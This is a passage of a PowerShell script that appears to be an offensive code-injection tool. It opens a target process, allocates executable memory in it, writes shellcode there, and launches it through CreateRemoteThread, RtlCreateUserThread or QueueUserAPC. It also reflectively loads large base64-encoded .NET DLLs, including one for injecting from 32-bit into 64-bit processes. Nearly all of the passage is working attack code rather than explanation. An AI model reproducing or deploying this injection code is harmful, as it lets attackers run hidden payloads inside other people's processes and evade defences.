echo "[+] Running against x64 process with ID: $ProcessIDVal"
|
|
$Proceed = $true
|
|
$64to32 = $true
|
|
}
|
|
|
|
$CurrentProcX86 = IsProcess-x86 $PID
|
|
if ($CurrentProcX86) {
|
|
echo "[+] Current process arch is x86: $PID"
|
|
if ($64to32) {
|
|
|
|
# https://github.com/Coder666/Invoke-CreateRemoteThread64/blob/master/Invoke-CreateRemoteThread64.ps1
|
|
# Author: TomW (Coder666)
|
|
# [Thread.Util]::CreateRemoteThread64()
|
|
|
|
$lib = "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d0ZyZWVUeXBlAGhIYW5kbGUAZHdNaWxsaXNlY29uZHMAbHBUaHJlYWRBdHRyaWJ1dGVzAGR3U3RhY2tTaXplAGR3Q3JlYXRpb25GbGFncwBscFRocmVhZElkAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBPdXRBdHRyaWJ1dGUATWFyc2hhbEFzQXR0cmlidXRlAFVubWFuYWdlZFR5cGUASW5BdHRyaWJ1dGUAd293NjRQcm9jZXNzAFN5c3RlbS5SZWZsZWN0aW9uAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUN1bHR1cmVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEFzc2VtYmx5VmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFN5c3RlbS5EaWFnbm9zdGljcwBEZWJ1Z2dhYmxlQXR0cmlidXRlAERlYnVnZ2luZ01vZGVzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBDcmVhdGVUaHJlYWQ2NABEbGxJbXBvcnRBdHRyaWJ1dGUAa2VybmVsMzIuZGxsAEtlcm5lbDMyLmRsbABFbnZpcm9ubWVudABPcGVyYXRpbmdTeXN0ZW0AZ2V0X09TVmVyc2lvbgBWZXJzaW9uAGdldF9WZXJzaW9uAGdldF9NYWpvcgBnZXRfTWlub3IAUHJvY2VzcwBHZXRDdXJyZW50UHJvY2VzcwBnZXRfSGFuZGxlAElEaXNwb3NhYmxlAERpc3Bvc2UASW50UHRyAFplcm8AZ2V0X1NpemUAQnl0ZQA8UHJpdmF0ZUltcGxlbWVu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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
|
|
$libraw = [System.Convert]::FromBase64String($lib)
|
|
$a = [System.Reflection.Assembly]::Load($libraw)
|
|
echo "[+] Injecting from 32bit to 64bit - Loading alternative library for CreateRemoteThread64"
|
|
}
|
|
} else {
|
|
echo "[+] Current process arch is x64: $PID"
|
|
$64to32 = $false
|
|
}
|
|
echo ""
|
|
|
|
if ($Proceed) {
|
|
|
|
try {
|
|
[IntPtr]$phandle = [Inject]::OpenProcess([Inject]::PROCESS_ALL_ACCESS, $false, $ProcessIDVal);
|
|
[IntPtr]$zz = 0x10000
|
|
[IntPtr]$x = 0
|
|
[IntPtr]$nul = 0
|
|
[IntPtr]$max = 0x70000000
|
|
while( $zz.ToInt32() -lt $max.ToInt32() )
|
|
{
|
|
$x=[Inject]::VirtualAllocEx($phandle,$zz,$Shellcode.Length*2,0x3000,0x40)
|
|
if( $x.ToInt32() -ne $nul.ToInt32() ){
|
|
break
|
|
}
|
|
$zz = [Int32]$zz + $Shellcode.Length
|
|
}
|
|
echo "VirtualAllocEx"
|
|
echo "[+] $x"
|
|
if( $x.ToInt32() -gt $nul.ToInt32() )
|
|
{
|
|
|
|
$hg = [Runtime.InteropServices.Marshal]::AllocHGlobal($Shellcode.Length)
|
|
[Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $hg, $Shellcode.Length)
|
|
$s = [Inject]::WriteProcessMemory($phandle,[IntPtr]($x.ToInt32()),$hg, $Shellcode.Length,0)
|
|
echo "WriteProcessMemory"
|
|
echo "[+] $s"
|
|
|
|
if ($RtlCreateUserThread.IsPresent){
|
|
|
|
$TokenHandle = [IntPtr]::Zero
|
|
$c = [Inject]::RtlCreateUserThread($phandle,0,0,0,0,0,[IntPtr]$x,0,[ref] $TokenHandle,0)
|
|
echo "RtlCreateUserThread"
|
|
$hexVal = "{0:x}" -f $c
|
|
if ($hexVal -eq "c0000022") {
|
|
echo "[-] Access Denied 0xC0000022"
|
|
} else {
|
|
echo "[+] Dec: $c"
|
|
echo "[+] Hex: 0x$($hexVal)"
|
|
}
|
|
|
|
} elseif ($QueueUserAPC.IsPresent) {
|
|
|
|
$QueuePtr = [IntPtr]::Zero
|
|
$TokenHandle = [IntPtr]::Zero
|
|
echo "QueueUserAPC"
|
|
echo "[+] ThreadID dwThreadID: $injectpiddwThreadID"
|
|
echo "[+] Handle hThread: $injectpidhThread"
|
|
$otptr = [Inject]::OpenThread(0x0010,$false,[int]$injectpiddwThreadID)
|
|
$QueuePtr = [Inject]::QueueUserAPC($x,$otptr, $TokenHandle)
|
|
$ResumeThread = [Inject]::ResumeThread($injectpidhThread)
|
|
echo "[+] Resume Thread Return Value: $ResumeThread"
|
|
$Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
|
|
|
|
} else {
|
|
|
|
if ($64to32) {
|
|
$e = [Thread.Util]::CreateRemoteThread64($phandle.ToInt32(),$x.ToInt32(),0)
|
|
echo "CreateRemoteThread64"
|
|
$e = 1241
|
|
} else {
|
|
$e = [Inject]::CreateRemoteThread($phandle,0,0,[IntPtr]$x,0,0,0)
|
|
echo "CreateRemoteThread"
|
|
}
|
|
$Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
|
|
echo "[+] $e"
|
|
|
|
if ($e -eq 0) {
|
|
$TokenHandle = [IntPtr]::Zero
|
|
$c = [Inject]::RtlCreateUserThread($phandle,0,0,0,0,0,[IntPtr]$x,0,[ref] $TokenHandle,0)
|
|
echo "RtlCreateUserThread"
|
|
$hexVal = "{0:x}" -f $c
|
|
if ($hexVal -eq "c0000022") {
|
|
echo "[-] Access Denied 0xC0000022"
|
|
} else {
|
|
echo "[+] Dec: $c"
|
|
echo "[+] Hex: 0x$($hexVal)"
|
|
}
|
|
}
|
|
|
|
}
|
|
|
|
$Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
|
|
echo "[-] LastError: $Lasterror"
|
|
} else {
|
|
echo "[-] Failed using VirtualAllocEx"
|
|
$Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
|
|
echo "[-] LastError: $Lasterror"
|
|
echo ""
|
|
}
|
|
} catch {
|
|
echo $Error[0]
|
|
}
|
|
|
|
# Close all handles
|
|
|
|
}
|
|
}
|
|
|
|
$psloadedprochandler = $null
|
|
Function IsProcess-x86 ($processID) {
|
|
|
|
if ($psloadedprochandler -ne "TRUE") {
|
|
$script:psloadedprochandler = "TRUE"
|
|
$ps = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDACx/YFoAAAAAAAAAAOAAIiALATAAAAgAAAAGAAAAAAAAJicAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANQmAABPAAAAAEAAAKgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAACcJQAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAALAcAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKgDAAAAQAAAAAQAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAIJwAAAAAAAEgAAAACAAUAUCAAAEwFAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAAMQBAAAjfgAAMAIAAEACAAAjU3RyaW5ncwAAAABwBAAABAAAACNVUwB0BAAAEAAAACNHVUlEAAAAhAQAAMgAAAAjQmxvYgAAAAAAAAACAAABRzUAFAkAAAAA+gEzABYAAAEAAAAPAAAAAgAAAAEAAAADAAAADQAAAA0AAAACAAAAAQAAAAEAAAABAAAAAQAAAAAAegEBAAAAAAAGAOIA7QEGAE8B7QEGAC8AuwEPAA0CAAAGAFcAlAEGAMUAlAEGAKYAlAEGADYBlAEGAAIBlAEGABsBlAEGAG4AlAEGAEMAzgEGACEAzgEGAIkAlAEGADgCjQEAAAAAAQAAAAAAAQABAIEBEACmAQAAPQABAAEAAAAAAIAAliAcAiUAAQAAIAAAAAABAAEAEwACIAIAKwIJALUBAQARALUBBgAZALUBCgApALUBEAAxALUBEAA5ALUBEABBALUBEABJALUBEABRALUBEABZALUBEABhALUBFQBpALUBEABxALUBEAAuAAsALAAuABMANQAuABsAVAAuACMAXQAuACsAcQAuADMAcQAuADsAcQAuAEMAXQAuAEsAdwAuAFMAcQAuAFsAcQAuAGMAjwAuAGsAuQADACMABwAjAG0BQAEDABwCAQAEgAAAAQAAAAAAAAAAAAAAAACmAQAAAgAAAAAAAAAAAAAAGgAKAAAAAAAAAAAAADxNb2R1bGU+AG1zY29ybGliAHByb2Nlc3NIYW5kbGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBrZXJuZWwzMi5kbGwAUHJvY2Vzc0hhbmRsZXIuZGxsAFN5c3RlbQBTeXN0ZW0uUmVmbGVjdGlvbgBQcm9jZXNzSGFuZGxlcgAuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMASXNXb3c2NFByb2Nlc3MAd293NjRQcm9jZXNzAE9iamVjdAAAAAAAAMe7zDzTzepJlqlyZm7cVhgABCABAQgDIAABBSABARERBCABAQ4EIAEBAgi3elxWGTTgiQECBgACAhgQAggBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAATAQAOUHJvY2Vzc0hhbmRsZXIAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTgAACkBACQ1ZjgyNWQwMC00N2QwLTQ2YWItYTc5Ny1lNGE5Yjk1N2U1N2YAAAwBAAcxLjAuMC4wAAAAAAAAAAArf2BaAAAAAAIAAAAcAQAAuCUAALgHAABSU0RTRWkwPXJV1k+vS2U2WvlSPAEAAABDOlxVc2Vyc1xhZG1pblxzb3VyY2VccmVwb3NcUHJvY2Vzc0hhbmRsZXJcUHJvY2Vzc0hhbmRsZXJcb2JqXFJlbGVhc2VcUHJvY2Vzc0